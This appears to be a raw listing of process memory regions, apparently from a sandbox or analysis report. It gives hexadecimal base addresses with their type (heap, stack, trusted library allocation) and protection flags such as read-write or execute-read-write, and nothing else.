trusted library allocation
page read and write
25E9A670000
heap
page read and write
2BDC2710000
heap
page execute and read and write
25EAC280000
trusted library allocation
page read and write
2BDC2716000
heap
page execute and read and write
25E9A49F000
heap
page read and write
15FE802D000
heap
page read and write
2357F884000
heap
page read and write
15FEA245000
heap
page read and write
2BDBA6B2000
trusted library allocation
page read and write
7FFE1653D000
trusted library allocation
page execute and read and write
235186B0000
heap
page read and write
22AD4035000
trusted library allocation
page read and write
7FFE16730000
trusted library allocation
page read and write
E20000
heap
page read and write
B7C000
heap
page read and write
7FFE165BC000
trusted library allocation
page execute and read and write
15FEA6F1000
heap
page read and write
1BDC9559000
heap
page read and write
23500060000
heap
page readonly
235005FB000
trusted library allocation
page read and write
1BDC953A000
heap
page read and write
2357DE9A000
heap
page read and write
7FFE165E6000
trusted library allocation
page execute and read and write
2357DE4E000
heap
page read and write
264559FE000
trusted library allocation
page read and write
26455A1A000
trusted library allocation
page read and write
2646DA66000
heap
page execute and read and write
1E92CAE5000
heap
page read and write
22AEA67F000
heap
page read and write
25E9A680000
heap
page read and write
88E61FF000
stack
page read and write
4F6B8BE000
stack
page read and write
B6E003E000
stack
page read and write
2201F7B0000
trusted library allocation
page read and write
22AD0643000
heap
page read and write
B6E0E4C000
stack
page read and write
7FFE16523000
trusted library allocation
page execute and read and write
7FFE165B6000
trusted library allocation
page read and write
15FEA245000
heap
page read and write
D44CA7E000
stack
page read and write
22AEA830000
heap
page read and write
25E9C2D8000
trusted library allocation
page read and write
2BDA8650000
heap
page read and write
25EB46A7000
heap
page read and write
25E9C180000
heap
page execute and read and write
7F5000
heap
page read and write
71DE68E000
stack
page read and write
7FFE166A9000
trusted library allocation
page read and write
C0CF4BC000
stack
page read and write
22021007000
heap
page execute and read and write
7FFE16820000
trusted library allocation
page read and write
7FFE16800000
trusted library allocation
page read and write
51401FF000
stack
page read and write
7FFE16860000
trusted library allocation
page read and write
2201F7DB000
heap
page read and write
7FFE168B0000
trusted library allocation
page read and write
22AEA9D8000
heap
page read and write
7FFE166DA000
trusted library allocation
page read and write
2201F559000
heap
page read and write
12AE1000
trusted library allocation
page read and write
22AD2376000
trusted library allocation
page read and write
C0CEDFE000
stack
page read and write
2BDC27B6000
heap
page read and write
2357DE95000
heap
page read and write
C0CED7F000
stack
page read and write
7FFE166A2000
trusted library allocation
page read and write
22AD0865000
heap
page read and write
2357DF07000
heap
page read and write
15FEA875000
heap
page read and write
264656BF000
trusted library allocation
page read and write
1BDC96B9000
heap
page read and write
7FFE16840000
trusted library allocation
page read and write
2BDC2D10000
heap
page read and write
15FE7DBE000
heap
page read and write
2350032F000
trusted library allocation
page read and write
22AD0760000
trusted library allocation
page read and write
DE0000
trusted library allocation
page read and write
26456C82000
trusted library allocation
page read and write
26453B82000
heap
page read and write
7FFE16740000
trusted library allocation
page read and write
D44CD7D000
stack
page read and write
264572D5000
trusted library allocation
page read and write
7FFE16750000
trusted library allocation
page read and write
7FFE16770000
trusted library allocation
page read and write
18E0A7A0000
heap
page read and write
26453AA9000
heap
page read and write
1BDC95B6000
heap
page read and write
22AD0684000
heap
page read and write
2BDAC07F000
trusted library allocation
page read and write
22AD2227000
heap
page execute and read and write
7FFE16730000
trusted library allocation
page read and write
B6E0C0E000
stack
page read and write
7FFE16870000
trusted library allocation
page read and write
1B905000
heap
page read and write
264572D9000
trusted library allocation
page read and write
22AD3950000
trusted library allocation
page read and write
2DC21C50000
heap
page read and write
B6E013E000
stack
page read and write
513FD4A000
stack
page read and write
18E0A790000
heap
page read and write
2DC21C5B000
heap
page read and write
B6DFDF9000
stack
page read and write
2BDC2756000
heap
page read and write
22023142000
trusted library allocation
page read and write
7FFE16760000
trusted library allocation
page read and write
23500050000
heap
page execute and read and write
C0CEF7D000
stack
page read and write
26455360000
trusted library allocation
page read and write
1BDC9586000
heap
page read and write
7FFE165B6000
trusted library allocation
page read and write
25E9A4EB000
heap
page read and write
7FFE16770000
trusted library allocation
page read and write
7FFE1650D000
trusted library allocation
page execute and read and write
7B7EB3E000
stack
page read and write
25E9C190000
heap
page execute and read and write
22020FF0000
trusted library allocation
page read and write
7FFE167E0000
trusted library allocation
page read and write
25E9C271000
trusted library allocation
page read and write
23500876000
trusted library allocation
page read and write
26455B23000
trusted library allocation
page read and write
1BDC9595000
heap
page read and write
2BDAA1B0000
heap
page read and write
22AD27B1000
trusted library allocation
page read and write
22AD22F1000
trusted library allocation
page read and write
7FFE16710000
trusted library allocation
page read and write
25E9C39D000
trusted library allocation
page read and write
7FFE16534000
trusted library allocation
page read and write
51400FF000
stack
page read and write
1BDCBE62000
heap
page read and write
1E92CA00000
heap
page read and write
D44C7FE000
stack
page read and write
25EB47B0000
heap
page read and write
7FFE16524000
trusted library allocation
page read and write
BC8000
heap
page read and write
26455340000
trusted library allocation
page read and write
D44DD0F000
stack
page read and write
15FE7D99000
heap
page read and write
22AD06E9000
heap
page read and write
25E9A430000
heap
page read and write
C0CF238000
stack
page read and write
7FFE166C9000
trusted library allocation
page read and write
7FFE16740000
trusted library allocation
page read and write
2BDC2840000
heap
page read and write
1B997000
heap
page read and write
2646DA60000
heap
page execute and read and write
22AD269E000
trusted library allocation
page read and write
22022F9D000
trusted library allocation
page read and write
7FFE16810000
trusted library allocation
page read and write
235003E6000
trusted library allocation
page read and write
23500020000
trusted library allocation
page read and write
7FFE16520000
trusted library allocation
page read and write
7FFE16880000
trusted library allocation
page read and write
7FFE167E0000
trusted library allocation
page read and write
1AE67000
heap
page read and write
25E9A420000
heap
page read and write
235186A0000
heap
page execute and read and write
15FEA6F0000
heap
page read and write
E7EBB7F000
unkown
page read and write
26453AE3000
heap
page read and write
51404FF000
stack
page read and write
22AD2175000
heap
page read and write
2201F54D000
heap
page read and write
C0CEC72000
stack
page read and write
4F6B47F000
stack
page read and write
E00000
trusted library allocation
page read and write
2900000
heap
page read and write
7FFE166A9000
trusted library allocation
page read and write
7B7E67D000
stack
page read and write
B6DFFB9000
stack
page read and write
7FFE16720000
trusted library allocation
page read and write
D44D07E000
stack
page read and write
2BDBA511000
trusted library allocation
page read and write
7FFE16630000
trusted library allocation
page execute and read and write
23510220000
trusted library allocation
page read and write
22AD063D000
heap
page read and write
E80000
heap
page read and write
22021621000
trusted library allocation
page read and write
1BDC9586000
heap
page read and write
23518727000
heap
page read and write
4F6BBBF000
stack
page read and write
6C15E7E000
stack
page read and write
D44CE77000
stack
page read and write
22AE22F1000
trusted library allocation
page read and write
7FFE16820000
trusted library allocation
page read and write
22AD063F000
heap
page read and write
7FFE16790000
trusted library allocation
page read and write
26465939000
trusted library allocation
page read and write
25E9A6B0000
trusted library allocation
page read and write
7FFE16510000
trusted library allocation
page read and write
15FEA6F2000
heap
page read and write
2BDC2930000
heap
page read and write
22AD21D0000
heap
page execute and read and write
2646DB90000
heap
page read and write
88E68FF000
stack
page read and write
4F6B7FE000
stack
page read and write
18E0A820000
heap
page read and write
88E67FE000
stack
page read and write
7FFE16514000
trusted library allocation
page read and write
2BDA8850000
heap
page read and write
7FFE16780000
trusted library allocation
page read and write
7FFE16740000
trusted library allocation
page read and write
2BDA876E000
heap
page read and write
7FFE167A0000
trusted library allocation
page read and write
25E9A532000
heap
page read and write
2201F750000
heap
page read and write
2BDA87B4000
heap
page read and write
15FE802A000
heap
page read and write
4F6B1D3000
stack
page read and write
C0CECFE000
stack
page read and write
18E0A829000
heap
page read and write
15FE7E70000
heap
page read and write
22039829000
heap
page read and write
1AB10000
trusted library allocation
page read and write
235002F5000
trusted library allocation
page read and write
1B06D000
stack
page read and write
2DC21C5D000
heap
page read and write
2357F880000
heap
page read and write
235002FF000
trusted library allocation
page read and write
7FFE166B4000
trusted library allocation
page read and write
7FFE16504000
trusted library allocation
page read and write
25E9C649000
trusted library allocation
page read and write
E7EBEFE000
stack
page read and write
2BDAA0F0000
trusted library allocation
page read and write
22AD22EC000
heap
page read and write
2350032C000
trusted library allocation
page read and write
25EB4600000
heap
page read and write
22021000000
heap
page execute and read and write
25E9C187000
heap
page execute and read and write
26453A50000
heap
page read and write
1BEBB000
stack
page read and write
2203190A000
trusted library allocation
page read and write
7FFE16830000
trusted library allocation
page read and write
C0CF079000
stack
page read and write
1E92CAF0000
heap
page read and write
C0D004D000
stack
page read and write
25EB45C4000
heap
page read and write
B6DFEB7000
stack
page read and write
2357DE1A000
heap
page read and write
2BDAB69B000
trusted library allocation
page read and write
22AD0609000
heap
page read and write
15FE7DCB000
heap
page read and write
7FFE1654B000
trusted library allocation
page execute and read and write
2350027F000
trusted library allocation
page read and write
7FFE165F0000
trusted library allocation
page execute and read and write
1BDCBF69000
heap
page read and write
7FFE16503000
trusted library allocation
page execute and read and write
22AD2A40000
trusted library allocation
page read and write
2BDC2500000
heap
page read and write
22AD22E0000
heap
page read and write
1BDC9586000
heap
page read and write
7FFE16800000
trusted library allocation
page read and write
B25000
heap
page read and write
7FFE16606000
trusted library allocation
page execute and read and write
1BDCBE61000
heap
page read and write
23500343000
trusted library allocation
page read and write
22022253000
trusted library allocation
page read and write
AF4000
stack
page read and write
D44D17B000
stack
page read and write
7FFE165EC000
trusted library allocation
page execute and read and write
25EB466C000
heap
page read and write
7FFE16730000
trusted library allocation
page read and write
1BDCB9BC000
heap
page read and write
25E9A4A7000
heap
page read and write
235186EF000
heap
page read and write
2BDA8830000
heap
page read and write
B3B000
heap
page read and write
7FFE16540000
trusted library allocation
page read and write
1BDC9593000
heap
page read and write
7FFE1651B000
trusted library allocation
page read and write
1BDCB37A000
heap
page read and write
7FFE16820000
trusted library allocation
page read and write
7FFE16513000
trusted library allocation
page execute and read and write
208B2ABB000
heap
page read and write
3B6CBFF000
stack
page read and write
25E9C674000
trusted library allocation
page read and write
7FFE1656C000
trusted library allocation
page execute and read and write
23518BE0000
heap
page read and write
7FFE16850000
trusted library allocation
page read and write
7FFE166B1000
trusted library allocation
page read and write
25E9C260000
heap
page execute and read and write
7FFE16524000
trusted library allocation
page read and write
7FFE166BA000
trusted library allocation
page read and write
235005EA000
trusted library allocation
page read and write
7FFE166B2000
trusted library allocation
page read and write
1BDC94A0000
heap
page read and write
25E9C3A6000
trusted library allocation
page read and write
71DD47E000
stack
page read and write
7FFE1681F000
trusted library allocation
page read and write
1B8D0000
heap
page read and write
2BDAC144000
trusted library allocation
page read and write
B52000
heap
page read and write
22AD04E0000
heap
page read and write
2AD0000
heap
page execute and read and write
1B917000
heap
page read and write
88E64FF000
stack
page read and write
4F6B6FE000
stack
page read and write
B4F000
heap
page read and write
7FFE1654B000
trusted library allocation
page read and write
E7EBE7E000
stack
page read and write
15FE7DC8000
heap
page read and write
26455490000
heap
page read and write
D44CFFE000
stack
page read and write
7FFE16830000
trusted library allocation
page read and write
22AD0720000
heap
page read and write
C0D00CE000
stack
page read and write
7B7E8BF000
stack
page read and write
2BDABE9A000
trusted library allocation
page read and write
2646DB1C000
heap
page read and write
7FFE166F0000
trusted library allocation
page execute and read and write
7FFE166D1000
trusted library allocation
page read and write
25E9C392000
trusted library allocation
page read and write
2BDAB132000
trusted library allocation
page read and write
22AD27FF000
trusted library allocation
page read and write
235186A7000
heap
page execute and read and write
1B98F000
heap
page read and write
7FFE165F6000
trusted library allocation
page execute and read and write
E85000
heap
page read and write
25EAC271000
trusted library allocation
page read and write
7FFE16840000
trusted library allocation
page read and write
15FE9F23000
heap
page read and write
15FE7E17000
heap
page read and write
2BDABE62000
trusted library allocation
page read and write
22AD0790000
heap
page readonly
25E9A4AD000
heap
page read and write
26453B47000
heap
page read and write
D44DD8C000
stack
page read and write
7FFE16720000
trusted library allocation
page read and write
7FFE166B9000
trusted library allocation
page read and write
220317D3000
trusted library allocation
page read and write
4F6B5FD000
stack
page read and write
23500374000
trusted library allocation
page read and write
6D0000
unkown
page readonly
25E9C8D9000
trusted library allocation
page read and write
2BDC2720000
heap
page read and write
B6DFB7E000
stack
page read and write
C0CF43B000
stack
page read and write
220216AB000
trusted library allocation
page read and write
7FFE1653D000
trusted library allocation
page execute and read and write
71DD67F000
stack
page read and write
7FFE1651B000
trusted library allocation
page read and write
22AEA750000
heap
page read and write
220396F1000
heap
page read and write
71DD57E000
stack
page read and write
C0CF1BC000
stack
page read and write
2351023B000
trusted library allocation
page read and write
23518680000
heap
page execute and read and write
7FFE166C0000
trusted library allocation
page execute and read and write
1BDCB372000
heap
page read and write
25E9C389000
trusted library allocation
page read and write
7FFE16740000
trusted library allocation
page read and write
235001F0000
trusted library allocation
page read and write
2350036C000
trusted library allocation
page read and write
71DE5CE000
stack
page read and write
22AD26AC000
trusted library allocation
page read and write
7FFE16504000
trusted library allocation
page read and write
1B4AA000
stack
page read and write
2201F595000
heap
page read and write
2BDA88B0000
heap
page read and write
7FFE165BC000
trusted library allocation
page execute and read and write
2D09000
trusted library allocation
page read and write
7FFE16810000
trusted library allocation
page read and write
15FE7DE6000
heap
page read and write
1B97B000
heap
page read and write
22031621000
trusted library allocation
page read and write
7FFE16790000
trusted library allocation
page read and write
2BDAA732000
trusted library allocation
page read and write
7FFE166F0000
trusted library allocation
page execute and read and write
C0CEE7E000
stack
page read and write
2357DE55000
heap
page read and write
2BDC275B000
heap
page read and write
2201F790000
trusted library allocation
page read and write
2357DE10000
heap
page read and write
2BDC26F0000
heap
page execute and read and write
235002AB000
trusted library allocation
page read and write
2351025B000
trusted library allocation
page read and write
7FFE167B0000
trusted library allocation
page read and write
88E69FC000
stack
page read and write
C0CFFCF000
stack
page read and write
1BDC9538000
heap
page read and write
22022FB0000
trusted library allocation
page read and write
7B7EC3E000
stack
page read and write
7FFE166C0000
trusted library allocation
page read and write
22039630000
heap
page read and write
22AD2170000
heap
page read and write
D44CC7E000
stack
page read and write
25E9A6E0000
heap
page readonly
B6E023B000
stack
page read and write
2BDC273C000
heap
page read and write
2830000
heap
page read and write
22021853000
trusted library allocation
page read and write
7FFE167A7000
trusted library allocation
page read and write
7B7E93E000
stack
page read and write
7FFE166E1000
trusted library allocation
page read and write
7FFE1652D000
trusted library allocation
page execute and read and write
15FE8029000
heap
page read and write
4F6BC3B000
stack
page read and write
7FFE16720000
trusted library allocation
page execute and read and write
7FFE166D2000
trusted library allocation
page read and write
7FFE16620000
trusted library allocation
page execute and read and write
2DC21C00000
heap
page read and write
7FFE166E0000
trusted library allocation
page execute and read and write
71DD97E000
stack
page read and write
7FFE16702000
trusted library allocation
page read and write
1BDC9568000
heap
page read and write
7FFE167F0000
trusted library allocation
page read and write
7FFE16750000
trusted library allocation
page read and write
26453B7C000
heap
page read and write
B6E0C8D000
stack
page read and write
22031690000
trusted library allocation
page read and write
2A0F000
stack
page read and write
1BDC955D000
heap
page read and write
7FFE168B0000
trusted library allocation
page read and write
7FFE16502000
trusted library allocation
page read and write
22AEA730000
heap
page read and write
25E9C38C000
trusted library allocation
page read and write
2BDAC009000
trusted library allocation
page read and write
22AD3ADF000
trusted library allocation
page read and write
22AD2220000
heap
page execute and read and write
2350037C000
trusted library allocation
page read and write
22AD26BD000
trusted library allocation
page read and write
7FFE167C0000
trusted library allocation
page read and write
7FFE16730000
trusted library allocation
page read and write
C0CFF0D000
stack
page read and write
7FFE165B0000
trusted library allocation
page read and write
7B7E4FF000
stack
page read and write
7FFE16532000
trusted library allocation
page read and write
1BDC953B000
heap
page read and write
22022F7E000
trusted library allocation
page read and write
220398AD000
heap
page read and write
26455350000
heap
page readonly
D44D1FB000
stack
page read and write
4F6B83F000
stack
page read and write
2350033D000
trusted library allocation
page read and write
23500229000
trusted library allocation
page read and write
7FFE16820000
trusted library allocation
page read and write
2645720F000
trusted library allocation
page read and write
7FFE16840000
trusted library allocation
page read and write
23500329000
trusted library allocation
page read and write
2357DCC0000
heap
page read and write
7FFE16750000
trusted library allocation
page read and write
71DDAFE000
stack
page read and write
15FE9C06000
heap
page read and write
220398B2000
heap
page read and write
22AEA950000
heap
page read and write
790000
heap
page read and write
22AD2801000
trusted library allocation
page read and write
22022FAC000
trusted library allocation
page read and write
7FFE167D0000
trusted library allocation
page read and write
7FFE167A0000
trusted library allocation
page read and write
51406FE000
stack
page read and write
2A4E000
stack
page read and write
7FFE165C0000
trusted library allocation
page execute and read and write
22AD0810000
trusted library allocation
page read and write
7FFE1651D000
trusted library allocation
page execute and read and write
7DF48D3C0000
trusted library allocation
page execute and read and write
7FFE16870000
trusted library allocation
page read and write
B82000
heap
page read and write
2BDA88B5000
heap
page read and write
7FFE166E0000
trusted library allocation
page execute and read and write
22AD2140000
heap
page execute and read and write
2201F610000
heap
page read and write
7FFE166E2000
trusted library allocation
page read and write
26453B25000
heap
page read and write
2BDAB97F000
trusted library allocation
page read and write
1BDC956D000
heap
page read and write
235186B5000
heap
page read and write
26453AE9000
heap
page read and write
220232CF000
trusted library allocation
page read and write
7FFE16880000
trusted library allocation
page read and write
71DD4FE000
stack
page read and write
7FFE165E0000
trusted library allocation
page execute and read and write
B6DFAFE000
stack
page read and write
4F6B4FF000
stack
page read and write
26455E33000
trusted library allocation
page read and write
26455495000
heap
page read and write
25E9C792000
trusted library allocation
page read and write
7FFE16830000
trusted library allocation
page read and write
26455C77000
trusted library allocation
page read and write
22022A9C000
trusted library allocation
page read and write
26456CAC000
trusted library allocation
page read and write
7FFE166F0000
trusted library allocation
page execute and read and write
7FFE165D6000
trusted library allocation
page read and write
7FFE16740000
trusted library allocation
page read and write
7FFE166C0000
trusted library allocation
page read and write
25EB4690000
heap
page read and write
B6DFCFE000
stack
page read and write
22AEA96C000
heap
page read and write
25E9A674000
heap
page read and write
26453AFD000
heap
page read and write
2BDC27C6000
heap
page read and write
2350025A000
trusted library allocation
page read and write
26453AC7000
heap
page read and write
23500040000
trusted library allocation
page read and write
B6DFD7D000
stack
page read and write
BD0000
heap
page read and write
71DD1A3000
stack
page read and write
7FFE166A0000
trusted library allocation
page read and write
26455D27000
trusted library allocation
page read and write
C0CEEFF000
stack
page read and write
25E9A6D0000
trusted library allocation
page read and write
71DE70F000
stack
page read and write
E23000
heap
page read and write
208B2BB0000
heap
page read and write
25E9A6F0000
trusted library allocation
page read and write
26456C7E000
trusted library allocation
page read and write
2645708C000
trusted library allocation
page read and write
22022F82000
trusted library allocation
page read and write
23500615000
trusted library allocation
page read and write
C0CEFFE000
stack
page read and write
C0D014B000
stack
page read and write
22AD0600000
heap
page read and write
7FFE16890000
trusted library allocation
page read and write
71DD8F8000
stack
page read and write
23518757000
heap
page read and write
1BDCBE68000
heap
page read and write
22039877000
heap
page read and write
760000
heap
page read and write
71DD7F9000
stack
page read and write
7FFE167C0000
trusted library allocation
page read and write
7FFE1657C000
trusted library allocation
page execute and read and write
4F6B57E000
stack
page read and write
2DC21F70000
heap
page read and write
1BDCB9B2000
heap
page read and write
7FFE167B0000
trusted library allocation
page read and write
25E9C386000
trusted library allocation
page read and write
7FFE16810000
trusted library allocation
page read and write
1E92CB39000
heap
page read and write
22AD26B9000
trusted library allocation
page read and write
7FFE16790000
trusted library allocation
page read and write
1E92CB30000
heap
page read and write
1E92CB4D000
heap
page read and write
1BDC94C0000
heap
page read and write
3B6CAFF000
unkown
page read and write
7FFE167B0000
trusted library allocation
page read and write
22AEA9CD000
heap
page read and write
7FFE167A0000
trusted library allocation
page read and write
D44DE0B000
stack
page read and write
23500771000
trusted library allocation
page read and write
7FFE167F0000
trusted library allocation
page read and write
15FEA244000
heap
page read and write
220210F0000
heap
page read and write
2201F598000
heap
page read and write
26455390000
trusted library allocation
page read and write
6C15C7C000
stack
page read and write
22AD22E7000
heap
page read and write
2BDA8778000
heap
page read and write
D44C7B3000
stack
page read and write
7FFE16640000
trusted library allocation
page execute and read and write
7FFE1655C000
trusted library allocation
page execute and read and write
7FFE165D0000
trusted library allocation
page read and write
15FE7DCE000
heap
page read and write
7FFE16530000
trusted library allocation
page read and write
1B8E0000
heap
page read and write
235188B0000
heap
page read and write
25E9A750000
heap
page read and write
264555B0000
heap
page execute and read and write
22AE25E8000
trusted library allocation
page read and write
71DD877000
stack
page read and write
26453A80000
trusted library allocation
page read and write
B6DF7F3000
stack
page read and write
2BDA87B2000
heap
page read and write
6D0000
unkown
page readonly
7FFE166D1000
trusted library allocation
page read and write
15FE8025000
heap
page read and write
2357DE6E000
heap
page read and write
23500332000
trusted library allocation
page read and write
2BDABE7D000
trusted library allocation
page read and write
7FFE16864000
trusted library allocation
page read and write
2201F593000
heap
page read and write
7FFE16890000
trusted library allocation
page read and write
88E63FE000
stack
page read and write
7FFE166CA000
trusted library allocation
page read and write
1BDC96BA000
heap
page read and write
D44D0FF000
stack
page read and write
22AD394E000
trusted library allocation
page read and write
2357DDC0000
heap
page read and write
15FE7F60000
heap
page read and write
2646567B000
trusted library allocation
page read and write
2646DA70000
heap
page read and write
7FFE16503000
trusted library allocation
page execute and read and write
7FFE16520000
trusted library allocation
page read and write
7FFE16780000
trusted library allocation
page read and write
C0CFE8E000
stack
page read and write
22021110000
heap
page read and write
18E0AA70000
heap
page read and write
71DE64D000
stack
page read and write
2BDABE8E000
trusted library allocation
page read and write
7FFE166C1000
trusted library allocation
page read and write
D44CBFD000
stack
page read and write
22AD05C0000
heap
page read and write
7FFE165B0000
trusted library allocation
page read and write
7FFE16730000
trusted library allocation
page read and write
22AD22C0000
heap
page read and write
7FFE166EA000
trusted library allocation
page read and write
22AD06EB000
heap
page read and write
B6E00BE000
stack
page read and write
BCA000
heap
page read and write
15FE7DC9000
heap
page read and write
22039B70000
heap
page read and write
7FFE167C0000
trusted library allocation
page read and write
7FFE16860000
trusted library allocation
page read and write
7FFE16710000
trusted library allocation
page read and write
2BDA87B7000
heap
page read and write
15FE7DBA000
heap
page read and write
2646DA99000
heap
page read and write
2357E0F5000
heap
page read and write
7FFE1653B000
trusted library allocation
page read and write
2357DDA0000
heap
page read and write
D44DBCE000
stack
page read and write
7FFE166F0000
trusted library allocation
page execute and read and write
B6E0CCE000
stack
page read and write
7FFE167DD000
trusted library allocation
page read and write
7FFE16790000
trusted library allocation
page read and write
25E9C38F000
trusted library allocation
page read and write
1B914000
heap
page read and write
7FFE168B7000
trusted library allocation
page read and write
7FFE16780000
trusted library allocation
page read and write
1BDC956A000
heap
page read and write
1BDCB69A000
heap
page read and write
25E9C78C000
trusted library allocation
page read and write
7FFE167A0000
trusted library allocation
page read and write
7FFE165BC000
trusted library allocation
page execute and read and write
235188C6000
heap
page read and write
2BDAA080000
trusted library allocation
page read and write
7FFE16720000
trusted library allocation
page read and write
7FFE16710000
trusted library allocation
page read and write
2201F510000
heap
page read and write
26456CBA000
trusted library allocation
page read and write
7F0000
heap
page read and write
2BDAA57E000
trusted library allocation
page read and write
2646DEF0000
heap
page read and write
23500634000
trusted library allocation
page read and write
2201F7D0000
heap
page read and write
15FE7C90000
heap
page read and write
25E9A46A000
heap
page read and write
51407FE000
stack
page read and write
220396C6000
heap
page read and write
7FFE166A2000
trusted library allocation
page read and write
22AD28DE000
trusted library allocation
page read and write
7FFE167B0000
trusted library allocation
page read and write
1B6CE000
stack
page read and write
7B7E77E000
stack
page read and write
22AEA686000
heap
page read and write
B10000
heap
page read and write
25EB4A70000
heap
page read and write
22AD07D0000
trusted library allocation
page read and write
7FFE16510000
trusted library allocation
page read and write
D44CDF9000
stack
page read and write
26453B2A000
heap
page read and write
E10000
trusted library allocation
page read and write
25E9C3DB000
trusted library allocation
page read and write
7FFE16830000
trusted library allocation
page read and write
1BDCBE60000
heap
page read and write
25E9A4BF000
heap
page read and write
7FFE167D0000
trusted library allocation
page read and write
2201F517000
heap
page read and write
25EB46D0000
heap
page read and write
7FFE165E6000
trusted library allocation
page read and write
7FFE167D0000
trusted library allocation
page read and write
B40000
heap
page read and write
7FFE16710000
trusted library allocation
page execute and read and write
26456C90000
trusted library allocation
page read and write
EE41BFD000
stack
page read and write
7FFE16840000
trusted library allocation
page read and write
7FFE16650000
trusted library allocation
page execute and read and write
7FFE167D0000
trusted library allocation
page read and write
1BDC96BD000
heap
page read and write
7FFE16790000
trusted library allocation
page read and write
26465671000
trusted library allocation
page read and write
25EB45C0000
heap
page read and write
7FFE166D0000
trusted library allocation
page execute and read and write
D44CEF9000
stack
page read and write
23500607000
trusted library allocation
page read and write
26453ADD000
heap
page read and write
26455640000
heap
page read and write
7B7E5FE000
stack
page read and write
22020FB0000
trusted library allocation
page read and write
7FFE16533000
trusted library allocation
page execute and read and write
2646DC8B000
heap
page read and write
7FFE16700000
trusted library allocation
page read and write
2BDAA501000
trusted library allocation
page read and write
88E60FE000
stack
page read and write
18E0A7C0000
heap
page read and write
7FFE16540000
trusted library allocation
page read and write
7FFE16860000
trusted library allocation
page read and write
208B2AB0000
heap
page read and write
6C15CFF000
unkown
page read and write
E7EBBFF000
stack
page read and write
7FFE16827000
trusted library allocation
page read and write
7FFE16700000
trusted library allocation
page execute and read and write
2BDA876B000
heap
page read and write
EE41FFF000
stack
page read and write
7FFE16850000
trusted library allocation
page read and write
B6DFBFD000
stack
page read and write
15FE7E14000
heap
page read and write
26453B76000
heap
page read and write
D44DE8E000
stack
page read and write
B6DFF3A000
stack
page read and write
28EE000
stack
page read and write
71DDA7E000
stack
page read and write
7FFE16780000
trusted library allocation
page read and write
770000
heap
page read and write
26453A55000
heap
page read and write
15FE7DE6000
heap
page read and write
7FFE167D0000
trusted library allocation
page read and write
71DD9FF000
stack
page read and write
E13000
trusted library allocation
page read and write
D44DC4D000
stack
page read and write
12AE8000
trusted library allocation
page read and write
25E9C2BB000
trusted library allocation
page read and write
264554A6000
heap
page read and write
2203986C000
heap
page read and write
7FFE16512000
trusted library allocation
page read and write
2351027E000
trusted library allocation
page read and write
235002F3000
trusted library allocation
page read and write
26455A0B000
trusted library allocation
page read and write
71DD6FE000
stack
page read and write
23500377000
trusted library allocation
page read and write
25E9C3A3000
trusted library allocation
page read and write
7FFE167E0000
trusted library allocation
page read and write
2BDAA1B5000
heap
page read and write
23518730000
heap
page read and write
2201F524000
heap
page read and write
6C15D7F000
stack
page read and write
C0CF2BE000
stack
page read and write
7FFE16750000
trusted library allocation
page read and write
26465948000
trusted library allocation
page read and write
7FFE166BA000
trusted library allocation
page read and write
2BDBA570000
trusted library allocation
page read and write
7FFE16740000
trusted library allocation
page read and write
C0CF13C000
stack
page read and write
235002F7000
trusted library allocation
page read and write
235187B0000
heap
page read and write
25E9C30A000
trusted library allocation
page read and write
71DDBFB000
stack
page read and write
7FFE16720000
trusted library allocation
page read and write
2646DCB5000
heap
page read and write
2201F6F0000
heap
page read and write
7FFE16770000
trusted library allocation
page read and write
7FFE166D4000
trusted library allocation
page read and write
23510244000
trusted library allocation
page read and write
264539F0000
heap
page read and write
51409FB000
stack
page read and write
12AEE000
trusted library allocation
page read and write
1BDCB020000
heap
page read and write
7FFE16850000
trusted library allocation
page read and write
22AEA630000
heap
page read and write
25E9C68B000
trusted library allocation
page read and write
15FE7D78000
heap
page read and write
7FFE165B0000
trusted library allocation
page read and write
88E66FD000
stack
page read and write
7FFE165E6000
trusted library allocation
page execute and read and write
208B2D70000
heap
page read and write
25EAC2DE000
trusted library allocation
page read and write
7FFE1652B000
trusted library allocation
page read and write
22020FB3000
trusted library allocation
page read and write
7FFE16770000
trusted library allocation
page read and write
7FFE16850000
trusted library allocation
page read and write
22AD394C000
trusted library allocation
page read and write
1B94A000
heap
page read and write
51408FF000
stack
page read and write
1BDC9518000
heap
page read and write
7FFE165E0000
trusted library allocation
page read and write
2646DC70000
heap
page read and write
7FFE165B6000
trusted library allocation
page read and write
7FFE16760000
trusted library allocation
page read and write
2BDC2997000
heap
page read and write
7FFE167B0000
trusted library allocation
page read and write
51403FE000
stack
page read and write
15FE7DE6000
heap
page read and write
7FFE16700000
trusted library allocation
page read and write
7FFE167C0000
trusted library allocation
page read and write
7FFE16820000
trusted library allocation
page read and write
7B7E7FE000
stack
page read and write
15FE7DD0000
heap
page read and write
2DC21BF0000
heap
page read and write
22AD201C000
heap
page read and write
23500211000
trusted library allocation
page read and write
7FFE165E6000
trusted library allocation
page execute and read and write
23500200000
heap
page read and write
7FFE168C0000
trusted library allocation
page read and write
2BDA8730000
heap
page read and write
7FFE16870000
trusted library allocation
page read and write
264539D0000
heap
page read and write
F8D000
stack
page read and write
22039820000
heap
page read and write
15FE7E23000
heap
page read and write
2202146E000
heap
page read and write
7FFE166E2000
trusted library allocation
page read and write
7FFE16522000
trusted library allocation
page read and write
7FFE16510000
trusted library allocation
page read and write
7FFE16616000
trusted library allocation
page execute and read and write
15FEA6F8000
heap
page read and write
EE41EFF000
unkown
page read and write
7FFE166D0000
trusted library allocation
page execute and read and write
71DD1EE000
stack
page read and write
2BDC2759000
heap
page read and write
1B5C4000
stack
page read and write
7FFE165C0000
trusted library allocation
page read and write
22AEA688000
heap
page read and write
7FFE167A0000
trusted library allocation
page read and write
88E5DDA000
stack
page read and write
7FFE166D9000
trusted library allocation
page read and write
1BDCB9B1000
heap
page read and write
22AEA9D5000
heap
page read and write
18E0A83D000
heap
page read and write
E7EBAFC000
stack
page read and write
22039740000
heap
page read and write
22AD0689000
heap
page read and write
7FFE16810000
trusted library allocation
page read and write
7FFE16710000
trusted library allocation
page read and write
7FFE16532000
trusted library allocation
page read and write
26455F3B000
trusted library allocation
page read and write
7FFE16820000
trusted library allocation
page read and write
2BDAA0F3000
trusted library allocation
page read and write
26456CB0000
trusted library allocation
page read and write
7FFE165C0000
trusted library allocation
page execute and read and write
7FFE167E0000
trusted library allocation
page read and write
22AD4084000
trusted library allocation
page read and write
22AD3921000
trusted library allocation
page read and write
26465651000
trusted library allocation
page read and write
22AEA726000
heap
page read and write
22AEA6EE000
heap
page read and write
7FFE166B4000
trusted library allocation
page read and write
7FFE16750000
trusted library allocation
page read and write
7B7E87E000
stack
page read and write
7FFE166C0000
trusted library allocation
page execute and read and write
25E9C7D1000
trusted library allocation
